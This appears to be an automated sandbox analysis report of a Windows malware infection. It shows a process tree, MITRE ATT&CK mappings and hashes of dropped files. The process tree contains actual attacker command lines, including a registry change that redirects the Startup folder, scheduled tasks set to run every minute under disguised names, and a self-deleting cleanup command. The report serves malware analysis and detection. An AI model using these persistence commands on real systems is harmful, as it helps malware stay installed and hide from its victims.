                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,16485556465495242517,13138568180526061926,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8720_317702184" --mojo-platform-channel-handle=3284 /prefetch:8
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:7024
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1532,16485556465495242517,13138568180526061926,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8720_317702184" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1616 /prefetch:2
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:6136
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_2F91.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                              PID:6964
                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          PID:2748
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                            PID:4116
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\37CD.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\37CD.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:7588
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:5692
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:8168
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:6912
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                      PID:5760
                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                  PID:7844
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                    PID:5576
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8F92.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8F92.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:6672
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\PUgYoDLyDx.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\PUgYoDLyDx.exe"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:7560
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                        PID:8580
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\8F92.exe"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:6860
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                          timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                          PID:4968
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\yF06dKokwc.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\yF06dKokwc.exe"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:7672
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:5652
                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                          PID:7824
                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                            DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{72e7f845-bfb0-4b4f-9bc8-de322e3b6645}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                            PID:7680
                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                            DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                            PID:6796
                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:6376
                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                            PID:7764
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                            PID:6840
                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                            PID:6484
                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                            PID:8432
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                              MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:3756
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                            PID:8856
                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            PID:8276
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:8340
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:8456
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:7224
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:2072
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:3560
                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                            PID:8232

                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                          Execution

                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                                                                          Modify Existing Service

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1031

                                                                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1060

                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                                                                          4
                                                                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                                                                          Disabling Security Tools

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1089

                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1130

                                                                                                                                                                                                                                                                          Credential Access

                                                                                                                                                                                                                                                                          Credentials in Files

                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                          T1081

                                                                                                                                                                                                                                                                          Discovery

                                                                                                                                                                                                                                                                          Software Discovery

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1518

                                                                                                                                                                                                                                                                          Query Registry

                                                                                                                                                                                                                                                                          7
                                                                                                                                                                                                                                                                          T1012

                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                                                                                                          7
                                                                                                                                                                                                                                                                          T1082

                                                                                                                                                                                                                                                                          Peripheral Device Discovery

                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                          T1120

                                                                                                                                                                                                                                                                          Remote System Discovery

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1018

                                                                                                                                                                                                                                                                          Collection

                                                                                                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                          T1005

                                                                                                                                                                                                                                                                          Command and Control

                                                                                                                                                                                                                                                                          Web Service

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1102

                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            8690d4cc29a3c112ee7f6eb3981ac438

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            9e1613d8880a003ac49e52150853673afcd7c8be

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            68c926b002e8f4e0784481ea5b902f0a86991ef47787300c913c17821af510c9

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            4caafb3cc066b7bb366e849117f86b36e5bc5bef48ee66e7a2fbab83c3613fe119946f80524423ccc85434223fd1aefeab472005e0d1f462101ba080c43286f3

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            f1c472f1bb4ddfe1b8ae5878c70bf5f5

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            fd6e8273bbffc3c8462af7ae655fbcb4eeaac5a7

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            ead6d16a404d306de4be2f87d7195bdc093e153b35ea8cbf16acb13223e2d13b

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            64d0fa9746acb597426cc63b09f9a2daa567c2edcc35c2677cd444be338f9c4e634fa98c472f3fc80ccf5681e28414ea46329321b32011e32feca04ccee74492

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aU0lq3rS9AYt7swzVmelr1Jt.exe.log
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x8DhO4zKpFWjEEHjgLVUu03J.exe.log
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zl9SXynrcd6IGZZxbWxHYH7B.exe.log
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-MC5AN.tmp\Uw3q9fiBK_7_tw0vLuiOhMeA.tmp
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            ffcf263a020aa7794015af0edee5df0b

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            bce1eb5f0efb2c83f416b1782ea07c776666fdab

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                                                            SHA512

